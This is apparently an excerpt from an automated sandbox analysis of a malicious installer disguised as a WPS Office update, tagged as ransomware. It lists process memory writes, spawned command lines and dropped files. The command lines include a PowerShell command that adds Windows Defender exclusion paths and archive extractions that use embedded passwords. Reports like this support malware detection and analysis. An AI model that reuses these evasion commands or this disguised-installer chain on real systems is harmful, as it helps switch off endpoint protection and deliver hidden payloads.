PID 4232 wrote to memory of 3840 N/A C:\Windows\System32\cmd.exe C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
PID 4232 wrote to memory of 2964 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 4232 wrote to memory of 2808 N/A C:\Windows\System32\cmd.exe C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
PID 2580 wrote to memory of 3400 N/A C:\Windows\System32\MsiExec.exe C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe
PID 2580 wrote to memory of 4840 N/A C:\Windows\System32\MsiExec.exe C:\Program Files\TransformOptimisticContributor\wpsupdate.exe
PID 2372 wrote to memory of 3204 N/A C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.exe C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe
PID 3204 wrote to memory of 1012 N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Windows\system32\msiexec.exe

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\wpsupdate.msi

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\srtasks.exe

C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2

C:\Windows\System32\MsiExec.exe

C:\Windows\System32\MsiExec.exe -Embedding 19DCCF2A218FDB0F52612F3CC81E7863 E Global\MSI0000

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\TransformOptimisticContributor','C:\Program Files','C:\Program Files'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /min "" "C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe" x "C:\Program Files\TransformOptimisticContributor\YRtKSPCVXxSCmPuaAzactTPSddUXyw" -o"C:\Program Files\TransformOptimisticContributor\" -p"03621GQD}PR[O^Dmi;;h" -y & ping 127.0.0.1 -n 2 & start /min "" "C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe" x "C:\Program Files\TransformOptimisticContributor\WhlKFlLXxHUitNNcNwtpUJDzrKytNL" -x!1_WSEcydALszNI.exe -x!sss -x!1_OzasXnwPtTbfCAAsrowrLIIDEPUHpa.exe -x!1_ -x!1_ -x!sa -o"C:\Program Files\TransformOptimisticContributor\" -p"93629#*_tvw?-L5@gQl=" -y

C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe

"C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe" x "C:\Program Files\TransformOptimisticContributor\YRtKSPCVXxSCmPuaAzactTPSddUXyw" -o"C:\Program Files\TransformOptimisticContributor\" -p"03621GQD}PR[O^Dmi;;h" -y

C:\Windows\system32\PING.EXE

ping 127.0.0.1 -n 2

C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe

"C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe" x "C:\Program Files\TransformOptimisticContributor\WhlKFlLXxHUitNNcNwtpUJDzrKytNL" -x!1_WSEcydALszNI.exe -x!sss -x!1_OzasXnwPtTbfCAAsrowrLIIDEPUHpa.exe -x!1_ -x!1_ -x!sa -o"C:\Program Files\TransformOptimisticContributor\" -p"93629#*_tvw?-L5@gQl=" -y

C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe

"C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe" -number 177 -file file3 -mode mode3

C:\Program Files\TransformOptimisticContributor\wpsupdate.exe

"C:\Program Files\TransformOptimisticContributor\wpsupdate.exe"

C:\Windows\System32\WScript.exe

C:\Windows\System32\WScript.exe "C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.vbs"

C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.exe

"C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.exe" install

C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.exe

"C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.exe" start

C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.exe

"C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.exe"

C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe

"C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe" -number 151 -file file3 -mode mode3

C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe

"C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe" -number 62 -file file3 -mode mode3

Network

Files

memory/1788-22-0x0000029231DB0000-0x0000029231DD2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tz2uhmuv.pcu.ps1

C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe

C:\Program Files\TransformOptimisticContributor\YRtKSPCVXxSCmPuaAzactTPSddUXyw

C:\Program Files\TransformOptimisticContributor\WhlKFlLXxHUitNNcNwtpUJDzrKytNL

C:\Program Files\TransformOptimisticContributor\2_WSEcydALszNI.exe

C:\Program Files\TransformOptimisticContributor\wpsupdate.exe

C:\Config.Msi\e57c535.rbs

C:\Windows\Installer\e57c534.msi

memory/3400-70-0x000000002A5A0000-0x000000002A5CF000-memory.dmp

C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.exe

C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.vbs

memory/3276-76-0x0000000000B90000-0x0000000000C66000-memory.dmp

C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.xml

\??\Volume{77a2731a-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{add72fab-36a5-4af6-b688-aed4c2a3c599}_OnDiskSnapshotProp

\??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\nKecPJAaIeFB.exe.log

C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.wrapper.log

memory/1012-109-0x0000000029F50000-0x0000000029F9D000-memory.dmp

memory/1012-110-0x000000002BB60000-0x000000002BD1D000-memory.dmp

C:\Users\Admin\AppData\Roaming\kingsoft\office6\log\update\wpsupdate_2024_11_19.log
